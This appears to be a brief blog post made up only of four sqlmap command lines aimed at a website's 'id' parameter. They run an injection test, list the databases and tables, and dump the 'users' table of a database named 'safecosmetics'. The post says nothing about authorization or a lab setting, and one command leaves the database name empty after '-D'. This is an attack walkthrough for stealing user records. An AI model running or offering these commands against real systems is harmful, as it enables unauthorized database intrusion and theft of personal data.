python sqlmap.py -u "http://www.site.com/section.php?id=51"
$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs
$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --tables -D
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users


0 comments:
Post a Comment